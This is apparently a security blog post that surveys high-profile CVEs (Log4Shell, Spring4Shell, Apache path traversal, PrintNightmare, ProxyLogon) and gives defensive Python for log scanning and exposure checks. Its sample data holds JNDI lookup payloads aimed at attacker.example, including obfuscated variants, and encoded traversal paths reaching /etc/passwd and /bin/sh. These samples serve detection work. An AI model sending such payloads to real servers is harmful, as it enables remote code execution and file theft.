Vulnerabilities that shook the internet

Introduction


Every day, a large number of security vulnerabilities are reported. Many of them can have serious consequences for your applications, websites and network infrastructure, and some of them lead to Remote Code Execution (RCE), as the Log4j vulnerability did. In this blog post, we'll go over a few vulnerabilities that are routinely abused against companies and that can hand an attacker the entire organization if exploited successfully. If you are developing applications or doing a penetration test for a business, you may well come across one of them.


What is a CVE?






Suppose researchers found several different vulnerabilities in an application, app1, which might be open source or might be used by many different users, in 2020, 2021 and 2022. How could I tell you which vulnerability I mean, what conditions are required to exploit it, and where its exploit code (if any) lives? I can't simply say "the one found in 2020"; a lot were discovered that year. This is why we have CVEs.

CVE stands for Common Vulnerabilities and Exposures. By its common definition, "it is a list of publicly disclosed computer security flaws." The list is maintained by the MITRE Corporation, and when we refer to a CVE we generally mean its identifier, a number that uniquely names one vulnerability.

The format of a CVE identifier is CVE-YYYY-NNNN, where YYYY is the year the ID was reserved or assigned and NNNN is a sequence number of at least four digits (longer sequence numbers are allowed; since 2014 there is no upper limit on their length).

For example, the first four IDs of 1999 would be written CVE-1999-0001, CVE-1999-0002, CVE-1999-0003 and CVE-1999-0004. A CVE is only assigned to a vulnerability in a publicly available product or component that can be tracked on its own. Assume you report cross-site scripting (XSS) to a certain website, and that XSS only exists on that specific site. It cannot get a CVE. If, however, you discover an XSS in a JavaScript library that is used by a large number of websites, the flaw affects all of them and needs to be tracked going forward, so it is assigned a CVE.
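The ID syntax above is easy to get wrong: the sequence number must have at least four digits, and copy-paste from web editors often turns the hyphens into en dashes (as happens in several places on this page). The following is an added example, not code from the original post, that validates and normalizes CVE IDs and pulls them out of free text; the function names are my own.

```python
import re

# Canonical syntax: prefix, four-digit year, sequence number of four or more digits.
CVE_ID = re.compile(r"^CVE-(\d{4})-(\d{4,})$")

# Dash look-alikes that word processors and web editors substitute for "-".
DASH_VARIANTS = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2011": "-"})


def normalize_cve_id(text):
    """Return the canonical CVE ID for a loosely written one, or None if invalid.

    Accepts a lower-case prefix, en/em dashes and surrounding whitespace, and
    rejects anything whose sequence number is shorter than four digits
    (so "CVE-1999-1" is not a valid ID).
    """
    candidate = text.strip().translate(DASH_VARIANTS).upper()
    match = CVE_ID.match(candidate)
    if not match:
        return None
    year, sequence = match.groups()
    return f"CVE-{year}-{sequence}"


def extract_cve_ids(text):
    """Return every well-formed CVE ID in free text, normalized, in order of appearance."""
    cleaned = text.translate(DASH_VARIANTS)
    return [found.upper() for found in re.findall(r"\bCVE-\d{4}-\d{4,}\b", cleaned, re.IGNORECASE)]


if __name__ == "__main__":
    # Constructed sample text for demonstration.
    sample = "Patched CVE-2021\u201341773 and cve-2021-42013; CVE-21-1 is not a real ID."
    print(extract_cve_ids(sample))
```

The dash translation matters in practice: an advisory search or a vulnerability-management import that compares the raw string "CVE-2021–44228" (with an en dash) against a feed will silently miss the entry.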


1. Log4Shell CVE-2021-44228


Apache Log4j is a Java logging library developed by the Apache Software Foundation. It is embedded, directly or through other Java logging frameworks, in a very large number of Java applications. In December 2021 a zero-day vulnerability in Log4j 2, known as Log4Shell, was disclosed that allows unauthenticated remote code execution.

Logging libraries write messages to a log file or a database, and a message is typically processed before it is written. Log4j 2 supports "lookups": a ${...} expression inside a log message is expanded at logging time, so ${date:yyyy-MM-dd} becomes the current date and ${env:USER} the current user's name. This is analogous to a $() subexpression in PowerShell, which is evaluated and spliced into a string. The problem is the JNDI lookup: if a logged string contains ${jndi:ldap://attacker.example/a}, a vulnerable Log4j contacts the attacker's server and can load and execute a remote Java class.

Attackers therefore place the payload wherever their input is likely to be logged. The most common spots are the User-Agent header and custom headers such as X-Forwarded-For, but any user-supplied value the application records for tracking, such as an email address or a username, works just as well.
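Because lookups nest, attackers rarely send the plain ${jndi:...} string; they hide it behind ${lower:j}, ${::-j} (an empty lookup with a default value) or URL encoding, which defeats naive string matching. The following is an added example, not part of the original post, of detection logic that peels those layers off before matching; the log lines are constructed for the demonstration and the function names are my own.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup: a body that contains no nested "${", "{" or "}".
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What remains once the obfuscation has been resolved.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def resolve_simple_lookup(body):
    """Statically evaluate the lookups attackers use purely for obfuscation.

    ${anything:-default} yields its default value and ${lower:X}/${upper:X}
    change case. Every other lookup (env, sys, jndi, ...) is left alone.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None


def _expand(match):
    resolved = resolve_simple_lookup(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize(text, max_rounds=20):
    """Percent-decode, then expand nested lookups from the inside out until stable."""
    for _ in range(3):  # values copied into access logs may be URL-encoded more than once
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        expanded = INNERMOST_LOOKUP.sub(_expand, text)
        if expanded == text:
            break
        text = expanded
    return text


def is_log4shell_probe(text):
    """True if the de-obfuscated text still contains a JNDI lookup."""
    return JNDI_LOOKUP.search(normalize(text)) is not None


def scan_log(lines):
    """Return (index, normalized_line) for each line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample access log: a benign line, three obfuscation styles seen in the
# wild, a URL-encoded query-string variant, and a harmless non-JNDI lookup.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 "curl/7.79"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 "${env:HOME}"',
]

if __name__ == "__main__":
    for index, normalized in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {index}: {normalized}")
```

This is a detection heuristic for logs and WAF rules, not a substitute for patching: it resolves only the lookups that are deterministic at rest, and an unresolvable wrapper such as ${sys:...} around the payload would still slip past it, so treat any unexpected ${...} in user-controlled input as suspicious.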

Exploit scripts are publicly available, so the fix is to upgrade: Log4j 2.16.0 disables JNDI by default and removes message lookups entirely, and 2.17.1 (2.12.4 for Java 7 and 2.3.2 for Java 6) also covers the follow-up CVEs found in the weeks after. Setting log4j2.formatMsgNoLookups=true alone is not enough; it was bypassed by CVE-2021-45046. Where upgrading is impossible, remove the JndiLookup class from the log4j-core jar.


2. Spring4Shell CVE-2022-22965


The Spring Framework is an open-source application framework that provides infrastructure support for Java-based web applications. In March 2022, two remote code execution vulnerabilities were disclosed in the Spring ecosystem. The first, CVE-2022-22963, affects Spring Cloud Function. The second, CVE-2022-22965, known as Spring4Shell, affects Spring Core, the "heart" of the framework, through the data binding used by Spring MVC and Spring WebFlux.

For a server to be exploitable with the public Spring4Shell exploit, several things need to line up.

The server must run JDK 9 or newer with a vulnerable version of the Spring Framework, the application must be packaged as a traditional WAR and deployed on Apache Tomcat, and it must depend on spring-webmvc or spring-webflux. The vulnerable versions are 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and all older, unsupported releases; the fixed versions are 5.3.18 and 5.2.20.

The vulnerability is easy to exploit and exploit code is available online. If the web application is run as root or Administrator, the attacker inherits those privileges on the web server.
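Because exposure depends on the combination above, the first thing to do in an assessment is check each precondition against the inventory rather than grepping for the word "spring". The following is an added example, not code from the original post or from the Spring project, that encodes those checks; the version ranges are the ones stated above and the function and parameter names are my own.

```python
# Affected Spring Framework ranges (inclusive) that received a fix; anything
# older than 5.2 is out of support and never got one.
VULNERABLE_RANGES = (((5, 3, 0), (5, 3, 17)), ((5, 2, 0), (5, 2, 19)))
FIXED_VERSIONS = ("5.3.18", "5.2.20")


def parse_version(version):
    """Turn "5.3.17" or "5.2.19.RELEASE" into a comparable (major, minor, patch) tuple."""
    parts = []
    for piece in version.split("."):
        if not piece.isdigit():
            break  # stop at qualifiers such as RELEASE or SNAPSHOT
        parts.append(int(piece))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def spring_version_vulnerable(version):
    """True if this Spring Framework version lacks the CVE-2022-22965 fix."""
    parsed = parse_version(version)
    if parsed < (5, 2, 0):
        return True
    return any(low <= parsed <= high for low, high in VULNERABLE_RANGES)


def spring4shell_exposure(spring_version, java_major, container, packaging, dependencies):
    """Evaluate every precondition of the public exploit chain.

    Returns (all_met, checks) so that a report can show which condition breaks
    the chain, e.g. an app still on JDK 8 is not exploitable this way.
    """
    checks = {
        "vulnerable spring version": spring_version_vulnerable(spring_version),
        "jdk 9 or newer": java_major >= 9,
        "deployed on tomcat": container.lower() == "tomcat",
        "packaged as war": packaging.lower() == "war",
        "spring-webmvc or spring-webflux present": bool(
            {"spring-webmvc", "spring-webflux"} & set(dependencies)
        ),
    }
    return all(checks.values()), checks


if __name__ == "__main__":
    # Constructed inventory entry for demonstration.
    exposed, checks = spring4shell_exposure("5.3.17", 11, "Tomcat", "war", ["spring-webmvc", "spring-core"])
    print("exposed:", exposed)
    for name, met in checks.items():
        print(f"  {name}: {met}")
```

A failed precondition only means the known public exploit (which writes a JSP web shell through Tomcat's access-log valve) does not apply; the underlying data-binding flaw is more general, so upgrade to 5.3.18 or 5.2.20 regardless of what the checks say.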


3. Path traversal and RCE in Apache HTTP Server CVE-2021-41773 and CVE-2021-42013


Apache HTTP Server 2.4.49, released in September 2021, had a path traversal vulnerability (often described as Local File Inclusion): a URL-encoded dot sequence such as .%2e/ was not normalized, so a request could map to files outside the document root if those files were not protected by "require all denied", and if mod_cgi was enabled the same trick could be turned into remote code execution. It was assigned CVE-2021-41773, and the Apache project quickly released 2.4.50 with a fix. However, the fix was incomplete: all an attacker had to do was encode the payload a second time (.%%32%65/) to bypass it. This was assigned CVE-2021-42013, and another release, 2.4.51, followed with a complete fix for both.
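The lesson of the second CVE is that a single decoding pass is not normalization. The following is an added example, not part of the original post, of request-path classification for log review or a WAF rule: it decodes until the path stops changing, records how many rounds were needed (two rounds is the CVE-2021-42013 signature), and then checks whether the normalized path climbs above the document root. The request paths are constructed for the demonstration and the function names are my own.

```python
from urllib.parse import unquote


def decode_fully(path, max_rounds=3):
    """Percent-decode until the result is stable; returns (decoded, rounds_needed)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def escapes_docroot(decoded_path):
    """True if the path, after resolving "." and "..", climbs above the root.

    A ".." that merely steps back into a sibling directory is normal and
    is not flagged; only a net depth below zero is a traversal.
    """
    depth = 0
    for segment in decoded_path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def classify_request_path(raw_path):
    """Decode a raw request path and report the traversal verdict and decoding depth."""
    decoded, rounds = decode_fully(raw_path)
    return {"decoded": decoded, "decode_rounds": rounds, "traversal": escapes_docroot(decoded)}


# Constructed request paths: CVE-2021-41773 style, CVE-2021-42013 style (double
# encoded), a benign ".." that stays inside the root, and a plain request.
SAMPLE_REQUEST_PATHS = [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd",
    "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh",
    "/icons/../images/logo.png",
    "/index.html",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUEST_PATHS:
        print(raw, "->", classify_request_path(raw))
```

Note that urllib's unquote leaves a lone "%" that is not followed by two hex digits untouched, which is exactly why %%32%65 decodes to %2e on the first pass and to "." on the second; any decoder that stops after one pass sees a harmless-looking path.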

Because Apache HTTP Server fronts a large number of web applications, both vulnerabilities were widely exploited in the wild, and exploits are readily available on the internet.

The remediation is to update to 2.4.51 or later.


4. Windows Print Spooler Remote Code Execution Vulnerability (PrintNightmare) CVE-2021-34527


This is one of the vulnerabilities that was, and still is, heavily exploited by attackers.

In computing, a print spooler is a program that manages the print jobs sent from a computer to a printer or print server. It provides a print queue, or buffer, where multiple jobs can be stored until the printer is ready for them.

The spooler earns its keep when many jobs are sent to a single printer. Printers are slow, so pending jobs are queued rather than blocking the applications that submitted them; when the printer is ready for the next document, the spooler hands it the next job from the queue, one at a time, until the queue is empty.

It turns out an attacker can use the Print Spooler to run privileged code. The Windows Print Spooler service runs as SYSTEM and improperly performs privileged file operations: an authenticated user who can reach the spooler, locally or over RPC, can make it install an attacker-supplied printer driver DLL, which then executes as SYSTEM. With that, an attacker can install programs, view, change or delete data, and create new accounts with full administrative rights.

Once exploit code became publicly available, exploitation increased sharply.

Ensure your servers have the latest patches installed, disable the Print Spooler service wherever it is not needed (domain controllers in particular), and restrict Point and Print driver installation to administrators.


5. Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) CVE-2021-26855


Microsoft Exchange Server is Microsoft's mail server and its email, calendaring, contact, scheduling and collaboration platform. It runs exclusively on Windows Server operating systems.

CVE-2021-26855 is a server-side request forgery in Exchange: an unauthenticated attacker who can make an untrusted connection to port 443 on the Exchange server can send requests that the server treats as coming from itself. In the ProxyLogon attacks of March 2021 it was chained with CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 to write web shells to disk and gain remote code execution. Administrators should install the updates on all Exchange servers, starting with those that are externally facing, and check those servers for web shells left behind.


6. Baigo CMS v3.0-alpine-2 CVE-2022-26607


Baigo is a content management system written in PHP. A remote code execution vulnerability was found in Baigo CMS v3.0-alpine-2: the CMS allows unrestricted file upload, so a maliciously crafted PHP file can be uploaded and then requested, which executes it on the server. Technical details of the exploit and the vulnerable function(s) are not available at the moment.

Because no public exploit exists yet, there is demand for one on the market; at the time of writing, its price is estimated at between $0 and $5,000.


Conclusion


In this blog post, we discussed some of the most commonly targeted services and applications on the internet. All the vulnerabilities discussed have a CVE assigned and, with the exception of Baigo, for which no exploit has been made public yet, their exploits are available online. There are others on the list that we will cover in subsequent posts.


Credit Source: Security Lit Limited


